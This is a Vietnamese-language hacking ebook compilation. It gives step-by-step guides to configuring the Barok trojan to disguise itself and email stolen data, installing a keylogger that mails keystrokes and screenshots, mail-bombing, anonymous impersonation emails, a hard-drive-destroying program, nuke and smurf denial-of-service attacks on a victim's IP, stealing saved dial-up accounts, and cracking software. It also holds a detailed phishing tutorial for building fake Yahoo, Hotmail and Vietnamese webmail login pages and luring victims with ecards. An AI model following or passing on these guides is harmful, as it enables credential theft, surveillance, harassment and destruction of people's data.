Ky thuat hack

http://wWw.Hack.Cf Page 1
Ebook kỹ tShuật hack
 hướng dẫn sendmail nặc danh với Anonym Mailer 2.0
 hướng dẫn sử dụng phần mềm aiepr
 hướng dẫn sử dụng trojan barok
 hướng dẫn sử dụng phần mềm revelation
 hướng dẫn sử dụng keylogger 5.04
 hướng dẫn sử dụng bommail demo
 hướng dẫn sử dụng chương trinh hdkp4
 hướng dẫn sủe dụng các chương trinh nuke
 hướng dẫn sử dụng chương trinh ShowPass
 hướng dẫn sử dụng chương trinh smurf2k
 hướng dẫn sử dụng phần mềm Stealther để dấu IP

 hướng dẫn hack tất cả các webmail bằng fakelogin
 hướng dẫn xài công cụ Essential NetTools để lấy account chùa
 hack credit card qua lỗi acart2_0
 hack credit card qua lỗi SalesCart Database Storage Insecurity
 hack credit card qua lỗi VP-ASP
 hack credit card qua lỗi trong file shopper.cgi
 hack credit card của Cart32 Sites
 một bài viết về cvv2
 hack server NT qua 1 số lỗi đã cũ
 khai thác lỗi hosting controller (HC)
 linux shell utils (by Microsoftvn)
 exploit for the "unbreakable" oracle database (by Microsoftvn)
 hack 1 hệ thống CisCo linux (by Microsoftvn)
 tự setup 1 cgiproxy riêng cho minh
 sơ qua về tấn công từ chối dịch vụ
 tổng hợp các lệnh của mIRC
 hướng dẫn làm một freedback form
 một vài link Free Sub Domain And Hosting
 Thư Viện Sách
 Welcome Việt Nam
 Cơ bản Cron trên Unix ( by Vicki )
 3 bước kiểm tra Card
 Hướng dẫn sử dụng NetCat
 Làm thế nào để Spam ? ( by Vicki Group )
 Bài viết tổng hợp về Hack của Squall Leonahart
 Tìm hiểu về SQL Injection ( by Vicki Group )
 Tìm hiểu về tràn ngăn xếp trên Windows ( by Vicki Group )
 Bài viết thoả hiệp Vnexpress của VKDT ( by Vicki Group )

 Hack anon@FTP ( by Kha Administrator Việt Hacker )
 Chạy File từ WebSite hay Email ( IE5.5, Win 2000 )
 Hack IIS server với bug unicode
 Format hard disk bằng email
 Mask Link
 Trojan chạy ngay sau khi mở email
 Hack Apache server với bug phf , và một số Bug khác
 Gửi thư nặc danh, bomb thử bằng Telnet
 Xâm nhập máy tính khi đang Online
 Hướng dẫn Hack Local Site ( by Lukos )
 Cross Site Scripting ( by Binhnx )
 Hướng dẫn Deface 1 Website
 Một số phương pháp Hack Email ( by Staff of HVA )
 Các kiểu tấn công hiện đại của Hacker ( by Staff of HVA )
 Những hiểu biết cở bản để trở thành Hacker ( by Staff of HVA )
Designer and Copyright
Hướng Dẫn SendMail Nặc Danh !
ok, tên chương trình này là Anonym Mailer 2.0, phương thức hoạt động là sử dụng
chính server của Anonym Mailer 2.0 để làm công việc vốn dĩ chẳng tốt đẹp gì là "
sendmail nặc danh" ! cái này rất nguy hiểm đó nha......nó làm cho 1 đôi đang yêu
nhau thành giận nhau ! 2 người bạn đang chơi thân thành oánh nhau ! nói chung là
méo mặt với nó nếu người nhận thư không biết gì về blacknet !
download here
ok, sử dụng phần mềm này vô cùng đơn giản, hãy làm như hình dưới đây và bạn sẽ
thấy nó lợi hại thế nào !

chú ý: chỉ được dùng thử 30 ngày ! sau 30 ngày đó bạn phải đăng ký, các bạn tự
tìm crack hoặc mua lấy dùng, đặc biệt khi giới thiệu phần mềm này mình không
khuyến khích các bạn đi phá hoại, nhưng với những kẻ quá khó chịu thì không nể
nang gì cả mà giả email của bạn gái hắn chửi cho hắn một trận !!
chúc vui vẻ
Phần Mềm Aiepr
làm cách nào để khoá IE : Download Here
vào internet options
INCLUDEPICTURE
"http://ptv5online.com/Hackofnew/aiepr/aiepr/huongdan/images/a.gif" *
MERGEFORMATINET
vào tab content

click trên enable và chọn những site cần khoá, hoặc có thể khoá bất kì site hay
website nào bạn không muốn người khác xài máy của bạn có thể vào được ( phần
này các bạn tự tìm hiểu )
khi gặp phải trò đùa này của 1 người nào đó trên máy tính của bạn thì thật là khó
chịu ! bạn không biết password để vào web ! chả nhẽ setup lại windows hay gost lại
PC của bạn chỉ với 1 trò đùa cỏn con đó ! tìm cách giải quyết vậy !
làm cách nào để phá password IE :
download phần mềm aiepr ở đây
sau khi unzip, setup các bạn vào program để chạy chương trình
click vào icon chìa khoá để enter seria
INCLUDEPICTURE
"http://ptv5online.com/Hackofnew/aiepr/aiepr/huongdan/images/2.jpg" *
MERGEFORMATINET
enter seria key ( có sẵn trong file .zip các bạn download )
INCLUDEPICTURE
"http://ptv5online.com/Hackofnew/aiepr/aiepr/huongdan/images/3.jpg" *
MERGEFORMATINET
báo đăng ký thành công

*click vào biểu tượng như hình để thực hiện các lệnh về password của IE
+delete password cũ của IE ( phá password )
+gõ password mới và click change password nếu bạn muốn change password cũ (
bạn không cần biết pw này vẫn change được )
khi thay đổi thành công
+khi muốm lấy lại password cũ
khi password cũ được lấy thành công

*click trên biếu tượng như hình sau để xem các pw và thông tin cho phép save trong
máy
màn hình hiển thị
*cuối cùng là chức năng coi những password đã được save trong máy khi bạn click
save khi login
thông tin thêm: phần mềm này là sản phẩm của hãng Elcom, bản này đã được mua sẵn
cho bạn. chúc vui vẻ
+++++++++++++++++++
anhlanonline@yahoo.com
Hướng Dẫn Sử Dụng Trojan Barok

trojan, backdoor,... đã được nhiều hacker việt nam sử dụng từ rất lâu rồi, khoảng
cách đây 4 năm, thế nhưng hiện nay còn rất nhiều người chưa biết cách xài, mặc dù
là những trojan "cổ" và thông dụng ! vì vậy xin viết bài này với mục đích hướng dẫn
những bạn chưa biết sử dụng con trojan barok. Download Here
( chú ý là trong quá trình làm việc với trojan các bạn phải disablen notron-antivirus
đi, và các bạn đừng sợ bị nhiễm vì nếu làm đúng cách sẽ không sao hết, điều này
tương tự như đùa nghịch với một quả lừu đạn vậy, biết thì không sao muh không
biết là.... tờ iêu tiêu !), sau khi unzip các bạn thấy có tất cả ba file như sau :
click vào file setup để setup cho server của con trojan này ( ở đây các bạn lưu ý một
chút là hầu hết các trojan có dung lượng server rất nhỏ và cilent thì lớn hơn, do phần
server sẽ là phần gửi đi cho victim hoặc đính kèm vào website còn phần cilent
thường dùng để hỗ trợ cho server hoặc xài để điều khiển ) :
sau khi click vào file setup các bạn chọn file server và click Open như hình dưới :
đây là màn hình hiển thị của barok sau khi open server :

+ các bạn chọn tên file muốn victim nhìn thấy sau khi lây nhiễm vào máy tính trong
mục Filename, theo kinh nghiệm trong phần này nên để tên gì ví dụ như
system.exe hay cái gì đó tương tự để victim không dám shutdown khi trojan đang
chạy
+trong phần Outgoing Mail Server (SMTP) và phần Destination Mail viết SMTP
và email của bạn, lưu ý rằng SMTP không nhất thiết phải là SMTP của email, và cái
này viết SMTP nào cũng được miễn là hỗ trợ sendmail để trojan send email ngược lại,
về điều này có lẽ cần bàn thêm 1 chút, vì phần này là quan trọng nhất, trojan hoạt
động được hay không là do cấu hình phần này tốt :
*SMTP gõ vào bắt buộc phải hỗ trợ sendmail mà không cần phải đăng ký
*các bác test SMTP của thằng yahoo coi sao :
mta469.mail.yahoo.com
mta545.mail.yahoo.com
*SMTP hồi xưa rất nhiều, hỗ trợ sendmail mà không cần phải đăng ký, còn bây giò
phải đăng kí mới được sử dụng dịch vụ này, các bạn tham khảo và test SMTP ở bài
viết hướng dẫn sử dụng bommail demo
sau đó chọn chế độ gửi thông tin về bất cứ lúc nào victim online (Every Online)
hoặc có thể chọn số ngày gửi thông tin về (Every ...day&up ) theo kinh nghiệm
mình khuyên các bạn nên chọn số ngày, vì nếu chọn box đầu thì sẽ phải nhận rất
nhiều thư ( mỗi khi victim online là 1 email mà) ....trừ khi để quản lí người iu thì mới
chọn box Every Online.....heheh

sau khi cấu hình xong cho server của barok bạn click vào Save Server như hình
trên, lúc đó bạn sẽ nhận được màn hình chúc mừng server đã save thành công như
sau :
tiếp sau đó click Exit để thoát khỏi cấu hình :
lúc này là ok rồi đó, bạn sẽ phải sử dụng con server ( vừa được bạn cấu hình ) để
send cho victim hoặc gắn nó vào một trang web nào đó rồi rủ victim vào chơi ! (
phần gắn server vào web này mời các bạn đọc trên website trong những bài sử dụng
công cụ gắn trojan vào web và sử dụng website để lấy trộm account internet )
chúc các bạn thành công và nghịch vui vẻ !
+++++++++++++++++++
Hướng Dẫn Sử Dụng Phần Mềm Revelation
revelation là phần mềm lấy lại password đã quên ( đựơc mã hoá dưới dạng *****)
các ví dụ về chức năng của phần mềm này:
+khởi động chương trình ( sau khi download, unzip và setup) : Download Here

+soi pasword của yahoo chat khi có ai đó "trót dại " save password lại !
+soi password của pop mail tong outlook. đầu tiên vào tool--->account :
sau đó vào tab mail, click vào account cần tìm lại pw và click propertes :

chọn tab server và kéo " ống nhòm" của revelation vào password mã hoá dạng ****
, vbạn sẽ thấy password trên dòng status của revelation ( pw trong ví dụ này là
"bimat!") :
+phần mềm này cũng soi được password trong yahoomail login :

hay trong hotmail login cũng vậy :
+những thông tin thêm : revelation không làm việc trên windows XP ( vì windows XP
sử dụng mã hoá 128bit ), đây là phần mềm free ! các bạn có thể ghé thăm website
chính của nó tại : http://www.snadboy.com
Sử Dụng Keylogger 5.04
*Bài viết với mục đích học tập. mình không khuyến khích các bạn đi phá hoại và
hoàn toàn không chịu trách nhiệm với bài viết của mình.

Chào các bạn, hôm nay mình xin giới thiệu đến các bạn 1 công cụ rất hay và khá ấn
tượng, đó là keylogger...Tại sao lại ấn tượng. Là bởi vì nó cho phép người dùng kiểm
soát toàn bộ bàn phím của 1 máy tính dù rằng không cần ngồi ở máy tính đó......
Ok! chúng ta bắt đầu tìm hiểu. Download Here
bước 1
Ver 5.04.zip trong bài này dành cho tất cả các phiên bản windows.Trong đó có sẵn
file register Đó là key đăng ký để có thể sử dụng hết các chức năng của keylogger
bước 2
Sau khi dowload keylogger về, các bạn double-click lến biểu tượng keylogger , sau
khi được cửa sổ như trên, các bạn tiếp tục click vào Etract để setup.
bước 2

Sau khi setup xong các bạn vào thư mục vừ setup keylogger double-click vào biểu
tượng bàn phím để cấu hình cho keylogger, tại box " Longin Engine Status " các bạn
click vào start để bất đầu cho keylogger hoạt độngcheck vào autostart để cho
keylogger tự động làm việc khi window khởi động.Coi hình dưới.
Tại box " logfile Configuration " nếu muốn thay đổi đường dẫn để mở keylogger các
bạn click vào " change.." để thay đổi cho hợp ý mình, thư mục mặc định là thư mục
chứa bộ setup keylogger của các bạn ( phần này không cần làm nếu bạn không
muôn change đường dẫn chứa dữ liệu của keylogger
bước 3
tại box các ban muốn keylogger chụp hình hiển thị của máy tính bao nhiêu phút 1
lần , check số phút mà bạn muốn vào box.Mặc định là 10 phút 1 lần, số phút nhỏ
nhất có thể được là 1 phút.

bước 4
Cấu hình để keylogger gửi email về cho các bạn. Đầu tiên gõ email của bạn trong
box " send To " , còn box Sender's eMail để nguyên, box " SMTP Host " các bạn gõ
SMTP server của server email các bạn vào và chọn số thời gian keylogger send email
trong box " Send file every "
mặc định là 30 phút, còn có thể thay đổi tuỳ theo ý thích của bạn.
bươc 5
Set password cho keylogger của bạn khỏi bị người khác xâm nhập bằng cách check
vào box " Password Protection " sau đó chọn password của bạn.
Crack cho keylogger: các ban crack với Username: vicki và Key: LGvFzeX= crack này
có trong file crack các bạn dowload ban đầu.Coi hình.

Ok! , đến đây là xong rồi đó !, nếu muốn coi bàn phím đã gõ những gì bạn vào thư
múc chứa keylogger ckick vào biểu tượng bàn phím sau đó ckick vào view và chọn
file các bạn mặc định để coi
ckick next để coi ví dụ những gì mà keylogger lấy được từ bàn phím
Chúc các bạn thành công.Các bạn có thể tham khảo thêm tại
http://www.keylogger.de
Sử Dụng MailDemo Để Bommail
bước 1
Sau khi unzip và chạy chương trình ta sẽ thấy giao diện của chương trình như sau
Download Here

bước 2
Chọn server dùng để bommail trong như trên.Sof này có 2 server cho bạn chọn.Nếu
bạn thích đính kèm file khi bommail bạn làm như hình sau:

sau đó chọn file và attach vào
bước 3
đánh số lượng mail muốn bom vào và điền các thông tin cần thiết. Ta sẽ có 1 giao
diện giống như hình trên
bước 4
click vào connect :
bước 5

Click vào nút play để bắt đầu bommail
bước 6
Sử lý sự cố khi send bom có vấn đề. Khi có thông báo không thể connect to server.
Chọn một server khác .Thông báo lỗi như sau:
Lúc đó có ngiã là chương trình chưa connect vào đựoc server để bommail. Bạn cần 1
server khác hỗ trợ việc gửi mail để connect
bạn có thể lấy server tại đây để phục vụ cho công việc của mình
Sau cùng click Play để bommail. Chúc các bạn thành công !
+++++++++++++++++++

Windows,Hard Drive Killer
okies ! hôm nay mình sẽ giới thiệu đến các bạn 1 vài phần mềm vô cùng nguy hiểm !
chỉ cần 1 click chuột là ổ cứng của bạn tiêu ngay lập tức !
chú ý: chỉ đọc, nếu thực hành ngay trên máy bạn, 99% ổ cứng của bạn sẽ hỏng !
không khuyến khích đi phá hoại !
đầu tiên các bạn download chương trình có tên hdkp4 tại đây. đây là sản phẩm của
website http://www.hackology.com
sau khi unzip các bạn thấy tất cả có 5 file, okies:
công việc " phá hoại" cực kì đơn giản chỉ bằng 2 click chuột vào file hdkp.exe như
hình trên là........ổ cứng của bạn sẽ chết ngay trong lần sau khởi động máy! chớ có
dại mà thực hành ngay, trừ khi bạn muốn thay ổ cứng mới, còn nếu không, kỹ thuật
phục hồi ổ cứng sau khi dính con này chưa có ở việt nam !
giải thích quá trình làm hỏng ổ cứng:
ngay sau khi click vào file, chương trình sẽ bắt đầu phá hoại tất cả data trên ổ cứng
của bạn, mặc dù cho bạn có dừng chương trình giữa chừng thì vẫn thế ! trong lần
sau khởi động máy tính chương trình sẽ tự động tiếp tục chạy !
chương trình này hoạt động nhờ vào thay đổi những thông tin trong file .bat vốn rất
quan trọng trong windows ! nó sẽ phá các track từ ổ cứng và bạn khó mà có thể
phục hồi lại dữ liệu hay làm gì với ổ cứng bạn có, sau khi chạy chương trình ổ cứng
của bạn coi như là cục sắt ! không làm gì được ngoài cách vứt vào sọt rác !
chú ý : chương trình này không làm việc trên những ổ cứng dòng MACS !
Ngoài ra, mình còn có 1 vài phần mềm khác muốn...chia sẻ với các bạn, tính chất
cũng là phá hoại y như thế, hdd và windows , nhưng với mức độ nhẹ hơn
các bạn có thể dowload format winkill winkill32
+++++++++++++++++++
Sử Dụng Nuke

NuKe rất lợi hại. Lợi hại chỗ nào? Đó là nếu ta biết được 1 địa chỉ ip của một máy
tính bất kỳ (máy tính quay số vào mạng bằng modem và tất nhiên ip của nó do thế
sẽ là ip động.) Thì ta hoàn toàn có thể cho ip đó disconnect , cho dù ip đó là ip của
cả 1 mạng LAN hay ip của một máy đơn người dùng thông thường.Trong bài hướng
dẫn này không đi sâu, mà chỉ nêu các xác định 1 ip thông qua 1 số con đường và
nơi có thể tìm thấy phần mềm nuke lợi hại này, cũng như cách sử dụng chúng.
Xác Định Địa Chỉ IP Của Một Người:
Có nhiều cách xác định địa chỉ ip, Các bạn chat trong iRMC có những cách rất hay (
nhưng rất tiếc mình không chat trong đó nên không biết :) )
Còn các bạn admin của site nào đó có thể thấy ip của member khi họ port bài.
cũng có thể dùng phần mềm để xác định địa chỉ ip của 1 người bạn quan hệ....
Ở đây mình giới thiệu 1 cách xác định địa chỉ ip của 1 người qua chat Aol , ICQ, MSN,
hoặc Yahoo.....
bước 1
Nếu bạn dùng Window Xp bạn vào start -->run-->gõ cmd như trên hình rồi click ok
Nếu bạn xài những hệ điều hành Window khác có thể vào start-->run-->đánh lệnh
command như hình dưới , sau đó cũng click ok

bước 2
Khi có 1 hộp thoại hiện ra, bạn tìm dòng C:Documents and settingstên sử dụng>
và gõ netstat -an như hình trên.Khi đó địa chỉ ip của máy các bạn sẽ nằm phía bên
trái cửa sổ hiển thị . Còn những địa chỉ ip các bạn có kết nối đến sẽ hiện phía bên
phải cửa sổ như hình sau đây:

Trên hình địa chỉ ip của mình nằm ở phía bên trái ngiã là 203.162.19.222 . Những
địa chỉ ip mình có kết nối đến nằm ở phía bên phải . Đó là các ip: 202.156.156.168 ;
216.136.233.138 ;194.19.127.21 .......
Nếu bạn chat của các bạn ở việtnam thì đỉa chỉ ip sẽ bắt đầu là 203.162... do đó chỉ
cần tìm những địa chỉ ip bắt đàu với 203.162....
như hình trên, mình đang chat với 1 người qua yahoo , ở việt nam-->ip của người đó
là 203.162.7.221 ....OK? Nếu đã hiểu các bạn click next .
bước 3
NUKE !
Có rất nhiều chương trình nuke, đây mình xin hướng dẫn 1 trình cơ bản tên là
Assault
Màn hình hiển thị của Assult như hình dưới đây:
Các bạn gõ ip cần nuke vào khung "Host"
trong khung "port " là cổng các bạn muốn bomber .Thông thường là
139,113,11,119,80
những bõ khác để nguyên và click ICM ECHO
dưới đây là cửa sổ hiển thị của Assault khi chạy, trong ví dụ này mình đang bom port
80 tức là cổng duyệt word wide web. Để có thêm chi tiết các bạn click here để có thể
biết rõ hơn về Port Number và Service.

Sau khi chạy được 1/2 số packs đảm bảo victim disconnet khỏi mạng. hê hê hê.
Cách duy nhất là reconnect
Click next để dowload các chương trình nuke.
DOWLOAD NUKE
dưới đây là một số hình để minh hoạ những chương trình nuke mà mình có:
(các bạn có thể download chúng ở đây )

nhiều hơn nữa: expgen085 ; udp2 ; udp5.........
+++++++++++++++++++

Phần Mềm ShowPass
mình xin giới thiệu đến các bạn phần mềm ShowPass
+hệ điều hành áp dụng: windows 95,98,98se,Me ( không dùng được với windows
2000 trở lên )
+chức năng: tìm lại username và password connect vào internet khi lỡ quên hay bị
mất ( mà đã save vào máy )
+ứng dụng : khi quên, mất, hoặc xài để ăn trộm account từ máy đang ngồi
+cách dùng: sau khi unzip, click vào file showpass để chạy chương trình, sau đó click
nút "DIALUPs" để tìm lại hay ăn trộm account
+homepage của phần mềm này http://www.xcoder.com
+++++++++++++++++++
hướng dẫn sử dụng smurf2k
đầu tiên các bạn download chương trình này tại đây
sau khi unzip , thấy 2 file broadcast.txt và Smurf2K.exe
click vào file Smurf2K.exe nhìn thấy giao diện như sau :
trong những bài trước, các bạn đã được học làm thế nào để tìm ip của 1 người đang
online hoặc 1 website
ok , bây giờ việc đơn giản để đi đến đích là bạn gõ IP của nạn nhân vào box victim,
rồi click smuf :

trong hình trên mình ví dụ IP của nạn nhân là 203.162.24.12
giờ mình sẽ nói tiếp công cụ này hoạt động như thế nào:
trước hết mục đích của công cụ này là send các gói dữ liệu đến website hoặc máy tính
của nạn nhân, nhằm mục đích bắt máy tính của nạn nhân hoặc website đó phải send trở
lại 1 gói dữ liệu, chuyện này là rất bình thường, nhưng do send quá nhiều đến website
hay PC , do đó website hay PC sẽ bi treo tạm thời, công cụ này sử dụng rất nhiều IP ( có
trong list của file broadcast.txt ) vào mục đích trên:
các bạn có thể mang supperscan lên mạng quét ip đang online để thêm vào list này
những IP mới nhằm mục đích cho cuộc tấn công diễn ra thuận lợi, càng nhiều IP
càng tốt !

chúc vui vẻ !
+++++++++++++++++++
HƯỜNG DẪN SỬ DỤNG PHẦM MỀM
Stealther
Download
Giới thiều :
Stealther là một phần mềm kết hợp với trình duyệt IE giúp bạn đảm bảo sự "nặc danh" khi duyệt web
vào download files,Stealther giúp bạn che giấu IP thật của mình khi ghé thăm các website, chặn các Cookie
nguy hiểm và đảm bảo sự bảo mật cho thông tin từ máy tính của bạn khỏi các website "tình báo".
Stealther bảo vệ mức tối đa quyền cá nhân của bạn khi lướt web, Stealther luôn luôn tự động cập nhật
những anonymous proxy và kiểm tra khả năng "nặc danh" của các proxy đó....
Nói tóm lại Stealther là một phần mềm tuyệt vời đối với những người muốn an toàn khi lên mạng.
Hướn dẫn sử dụng :
Cài đặt :
Sau khi download bạn chạy file stealther_setup.exe để bắt đầu quá trình cài đặt:

Khi chạy file stealther_setup.exe sẽ có một thông báo như hình trên yêu cầu lựa chọn ngôn ngữ cài đặt, bạn
chọn mặc định là English (UK)
Sau đó bạn làm theo các hướng dẫn trong quá trình cài đặt sau khi cài đặt xong bạn chọn 1 trong 2 lựa chọn.
1 là khởi động lại windows, 2 là khởi động sau, tiếp tục quá trình.

Kết thúc quá trình cài đặt bạn cần phải Crack phần mềm để sử dụng được hết tất cả các chức năng của nó
Crack:
Để crack chương trình bạn cần download bản crack ở đây
Trước khi crack bạn cần phải close chương trình lại, unzip file vừa download và copy file crack.exe vào cùng
thư mục vừa cài đặt Stealther mặc định là C:Program FilesStealther.

Chạy file crack.exe, quá trình crack thành công bạn sẽ nhận được thông báo :
Nhưng bạn đừng tưởng đến đây là đã crack được và đã có thể sử dụng được hết chức năng của nó nghe :)
khì khì
Tiếp theo bạn chạy Stealther sẽ xuất hiện một biểu tượng nho nhỏ trong system tray
Dubble Click hoặc Click phải chuột chọn Show windows. Vào menu File --> Unlock Trial Version
Nhập tên bạn ( gõ liền ) rồi nhấn Unlocknow!, Unlock thành công bạn sẽ nhận được thông báo

Ok crack xong rồi bây giờ đến cách thiết lập để có thể "nặc danh" khi lướt web.
connect hoặc sẽ dùng để Thiết lập cấu hình cho IE bạn vào Internet option --> Connections --> chọn
Connection sẽ "nặc danh" (connection mà bạn đang connect nếu bạn thiết lập cho một connection mà
connect bằng connection khác thì sẽ không có tác dụng gì hết) --> Settings
Tiếp theo bạn chọn Use a proxy server rồi chọn Advanced..

Nhập vào mục HTTP : Proxy address to use : 127.0.0.1 Port 14000 --> OK thế là xong tiết mục thiệt lập
thông số cho IE giờ đến tiết mục thiết lập cho Stealther.

Thiết lập cho Stealther cũng đơn giản như thiết lập cho IE thôi. Show windows để mở cửa sổ chính của
chương trình, trong cửa số chính bạn có 3 lựa chọn trong mục Change Surfing Mode to để lựa chọn mode
"nặc dạnh" theo tôi lựa chọn tốt nhất là lựa chọn thứ 2 Strealth Mode.
Tiếp nữa bạn vào menu Proxy-engine --> View/Edit/Check để xem proxy list. Bạn có thể thêm, sửa, xoá,
check proxy để sử dụng.

Để thêm 1 proxy vào list bạn vào munu Edit --> Add new proxy entry

Nhập proxy như hình trên rồi nhấn Apply, ban cũng có thể Add nhiều proxy một lúc vào list bằng cách copy
và paste
Để có thể có nhiều proxy để thêm vào list bạn có thể lấy ở đây, bạn copy và paste vào proxy list.
Để kiểm tra proxy bạn vào menu Check --> Check All hoặc Check Selected.
Một proxy tốt thì sẽ có mục Working là yes nếu proxy nào có khả năng "nặc danh" thì mục Anonymos là
Yes. Bạn có càng nhiều proxy như vậy thì càng tốt. Khi xong xuôi những bước trên, để kiểm tra xem thành
quả của các quá trình bạn thực hiện, bạn vào đây để check xem proxy bây giờ của bạn thế nào. Ok. hết!
Chúc bạn thành công!
Hướng Dẫn Hack Tất Cả Các Webmail
(dành tặng Nguyễn Phương Anh )
trò này thực ra đã có từ rất lâu rồi, website anhlan cũng đã viết bài hướng dẫn chi
tiết ngay từ những ngày đầu, khi mà con số người biết về trò này ở việt nam còn rất
ít, do site anhlan.com dow nên data bị mất, mình nghĩ rằng ai cũng biết trò này, hì,
nhưng thấy có nhiều người hỏi quá nên hôm nay cho phép mình được post lại bài này
với mức độ chi tiết nhất có thể , bài viết này xin dành tặng bạn gái của mình:
Nguyễn Phương Anh (YM: tinh_yeu_tre_con )
ok, let's go ! chúng ta cùng bắt đầu !
Tạo SoucreCode Riêng Cho Bạn
tại sao mình lại nói thế? trong bài viết này bạn sẽ học cách lấy trộm password email
của tất cả các webmail ! ví dụ như @ttvnonline.com, fastmail.ca , @hn.vnn.vn,

@fptnet.com ...chứ không phải chỉ riêng yahoo hay hotmail , vì vậy trong bước 1 này
mình muốn hướng dẫn cách để có một cái soucre để sử dụng sau này.
bước 1:
các bạn vào http://www.bravenet.com sau đó gõ email của các bạn ( email ở
webmail nào cũng được, ví dụ như tenban@yahoo.com hay tenban@hotmail.com hay
tenban@ttvnonline.com đểu được, miễn là bạn sở hữu hòm mail đó-và đây là hòm
mail các bạn sẽ nhận password của victim sau này ! ) vào box như trong hình rồi
click join :
bước 2:
checkmail tại email mà bạn vừa enter ( của mình phải check hòm mail
alonedrinkwine@msn.com còn các bạn sẽ check hòm mail của các bạn xài để đăng
ký )
click vào link mà bravenet vừa đưa cho như hình dưới đây :
sau khi click sẽ có một cửa sổ đăng ký account
các bạn đăng ký một account trong trang này, đây là mẫu đăng ký của mình, còn các
bạn tự chọn, xin nói qua là phần này không quan trọngvà không phải ghi chính xác
thông tin của bạn !

điều quan trọng nhất trong phần này là box "website URL" .Tại box này bạn hãy
enter địa chỉ mà bạn muốn victim nhìn thấy sau khi click vào form fakelogin của các
bạn, trong ví dụ này mình chọn site riversongs.com -là một site về ecard :

sau khi click register như hình vẽ bạn sẽ thấy 1 trang tiếp theo, không cần làm gì cả
ngoài click vào continue như hình :
sau khi click như trên sẽ có 1 trang mới hiện ra với lời chào mừng đăng ký thành
công như hình dưới :
okies, giờ bạn tìm box login như hình dưới đây , sau đó gõ user và password của bạn
vào ( vừa đăng ký với bravenet ) rồi click Login
sau khi login được vào bạn tìm mục Email Forms như hình dưới đây và click vào:
click vào rồi sẽ nhìn thấy một đoạn mã lằng nhằng như hình dưới ! các bạn chú ý
coppy thật chính xác đoạn bắt đầu từ <form action=......cho đến...... value="1"
/> như hình dưới đây:

okies, ghi nhớ lấy đoạn mã này vào bất cứ đâu như word hay notepad để sử dụng
cho sau này , nó là của riêng bạn ! giờ click next để qua trang 2 với cách sử dụng
soucre này để ăn trộm pw email của các webmail.
sau khi có đoạn soucrecode của riêng bạn rồi,save nó lại rồi, bạn bắt đầu học cách
hack password của một vài webmail thông dụng, sau đó làm tương tự cho bất kỳ
webmail nào khác mà bạn biết !
Hack Password YahooMail
sau khi vào trang http://mail.yahoo.com bạn click chuột phải vào một khoảng trống
bất kỳ, chọn View Soucre như hình dưới :
tìm thẻ <head> , thẻ này ở ngay đầu tiên sau thẻ <html> các bạn paste đoạn code
lúc nãy vào ngay dưới thẻ này như hình dưới :

sau khi paste vào, bạn vào menu file, chọn Save As như hình :
trong cửa sổ Save As này phần save as type chọn là All Files như hình bên :
sau đó gõ File name là yahoo.htm ( hay login.htm tuỳ bạn miễn là có .htm đằng
sau !)

sau khi save file này lại dưới dạng .htm, bạn view upload chúng lên website nào đó
rồi thử login qua , sau đó checkmail tại email bạn đăng ký lúc đầu, sẽ thấy như thế
này :
và đây là phần password ( test và test] )
thế là xong ! bạn có thể coi bản demo tại đây
Hack Password Hotmail

làm tương tự như với yahoomail, đầu tiên bạn vào http://hotmail.com sau đó view
soucre như hình dưói :
cũng paste đoạn soucre mà mình đã bảo các bạn save vào ở trang trước vào sau thẻ
<head> tương tự như làm với yahoo mail :
sau đó cũng làm tương tự yahoo rồi save lại dưới dạng .htm như hình dưới, sau đó
upload lên website của các bạn rồi gạ victim vào chơi ! coi demo tại đây
Hack Mail.vnn.vn
đầu tiên vào http://mail.vnn.vn cũng view soucre và paste sau thẻ <head> rồi save
dưới dạng file .htm :

coi demo tại đây
Hack @ttvnonline.com
đầu tiên cũng vào website http://ttvnonline.com chọn email rồi view soucre :
cũng paste đoạn code riêng của các bạn sau thẻ <head> :
save lai dưới dạng .htm rồi làm như yahoo hoặc hotmail, nhưng khi click vào thì
không thấy cái lôgo của ttvnonline đâu ! như hình dưới , nếu không có chắc chắn
victim sẽ ngi ngờ rất nhiều !

vì vậy bạn hãy vào save cái logo của nó hoặc coi đường dẫncủa cái logo này rồi edit
file đã có đoạn soucre của các bạn bằng front page hay notepad, điều này rất dễ làm
và có hướng dẫn cụ thể ở site http://vtv4online.com ( trong này cũng có hướng dẫn
cách thức đăng ký một website free và cách upload file lên host dành cho những bạn
mới bắt đầu )
coi demo tại đây
okies, như vậy sơ qua mình đã hướng dẫn các bạn lấy trộm pw email của 4 webmail
khá thông dụng, tương tự như thế bạn sẽ đem đi làm với các webmail khác mà bạn
biết!
nếu bạn đã làm xong việc upload những page .htm đã được sửa đổi lên host của bạn,
hãy click qua page3 để coi cách làm 1 thiệp điện tử lừa victim !

sau khi biết làm fake login của các webmail và rủ victim vào "chơi" để ăn trôm pw
của họ thành công rồi, thì tự nhiên có một điều nảy sinh ! đó là chẳng nhẽ mỗi lần
muốn ăn trộm pw của ai đó ( ví du: victim@ttvnonline.com ) thì lại phải chat với
victim hay send email gạ nó vào page làm sẵn trên host của mình à !
vì lý dó này mình hướng dẫn tiếp các bạn cách để chỉ cần gửi 1 ecard đến hòm thư
của victim như những ecard bình thường nhưng lừa victim vào page làm sẵn của ta !
cách làm :
vao một trang ecard bất kỳ, send 1 cái bất kỳ về hòm thư của chính bạn,ví dụ mình
có một cái thế này :
Your friend anh lan found a site that they thought you'd like. Check it
out:
http://www.riversongs.net/Flash/you.html
This free tell-a-friend service is made possible by our sponsors:
*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*
**RIVERSONGS BEARY MERRY CHRISTMAS**
http://www.riversongs.com/Flash/bmas.html
*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*~~*
=====================================================
YOU’RE A WINNER!!
No Scams, No Kidding- Everything Is FREE!!
School Cool Barbie, Coca-Cola Monopoly, Yankees vs. Mets Chess Set,
Simpsons Wall Clock, Clue, Star Wars Monopoly, Cordless Phones,
Weight Watchers Software, Scooby Doo Gifts, Curious George Watches,
and Biker Sunglasses, all yours for FREE!!
Don’t miss out on other FREE gifts like, a Bart Simpson Lunch Box,
Batman Comic Books, James Dean glasses, and MORE!!
All gifts are FREE!!
Don’t Miss Out, Click Here While There’s Still Time:
http://www.supertaf.com/adt.php?a=7608461
=====================================================
====================================================
NEED A CAR - New or Used?
Good or Problem Credit - eCarCredit will can get your car and the loan
you deserve. Thousands of people across the country have purchased

cars and received auto loans with eCarCredit's help through our
NATIONWIDE NETWORK of auto dealers & lenders.
Don't have perfect credit? You can get a car loan with our FREE 2
minute application!
Plus our Loan Advisors HELP YOU FIND A CAR that fits your needs
from a local dealer at no extra cost.
Click here for your new car TODAY!
